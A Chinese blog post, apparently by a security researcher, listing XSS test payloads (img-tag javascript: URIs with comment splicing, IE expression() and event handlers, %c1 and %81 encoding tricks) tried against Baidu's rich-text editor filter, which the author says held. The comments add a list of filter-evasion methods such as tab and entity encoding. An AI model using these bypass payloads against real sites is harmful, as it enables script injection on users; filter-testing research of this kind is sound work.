测试百度XSS Filter的一些例子

来源:大风起兮云飞扬

今天有朋友和我讨论了一下关于百度富文本编辑器 XSS Filter的问题,关于过滤规则可以看我之前在WoBB终章里总结的8条规则。

这里我可以把我测试XSS Filter的部分html发一下,希望能帮助到某些朋友。(当然我最终还是没绕过去)

如下:

<img src=”java/*/*javascript*/script/*javascript*/*/script:alert();” >

<img src=”java/*/*javascript*/java/*javascript*/script/*javascript*/*/script:alert();” >

<img src=”java/*java/*javascript*/1script*/script:alert();”>

<img src=”java/*script:alert();”><img src=”javaa*/script:alert();”>

<img src=”java/*exp/**/script:alert();*/ression(alert(1))”>

<img style=”width: exp/*ression(alert());” src=”java/*exp/**/script:alert();*/ression(alert(1))”>

<!–[if IE]><![endif]–>

<img src=”java/*javascript*/script java\script:alert();”>

<img src=”java/*javascript*/1script/*><x src=javascript:alert();”>

<img src=”java/*java/*javascript*/1script*/script:alert();/*><x fvck=java/*style=\java*/script:alert();>

<img src=”java/*java/*<a fvck=’java/*style=\java*/script:alert();’>*/1script*/script:alert();”>

<img src=”java/*java <a href=’/*java/*style=\java*/script:alert();’>*/script:alert(); > ”

<img src=<java/*<<a>>*/scrip >>

<a style=”background-image: url(@import \’ fvck\’) ” >

<img onbeforeupdate=”fvck” ondataavailable=”fvck” onrowsdelete=”fvck” onrowsinserted=”fvck” />

<img src=”java/*ssss%c1*/script:alert();*/”>

<img src=”java/*sssss%c1*/%c1/*script:alert();*/script:alert();”>

<img src=”java/*java <a href=’java/*java/*style=%c1\java%c1*/script:alert();’>*/script:alert(); > “>

<img src=”javascript:alert();”>

%ef’);alert();(

<img src=”j%c1%26;javascript:alert();” >

<img src=”java/*xxxx%81*/script:alert();” >

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • kxlzx

    嘿嘿。。。过几天看篇文章,或许对你有帮助。。。
    现在文章没发布。。。嘿嘿。。。作者注意浏览鬼子的blog哦。。。

  • 8080

      躲避方法1)在javascript中加入多个tab键,得到

      ;

      躲避方法2) 在javascript中加入&#x09编码字符,得到

      ;

      躲避方法3) 在javascript中加入

      字符,得到

      ;

      躲避方法4)在javascript中的每个字符间加入回车换行符,得到

      

      躲避方法5)对”javascript:alert(‘XSS’)”采用完全编码,得到

      

  • aa

    alert(“lxai”)

  • sss

    alert(‘test’);

发表评论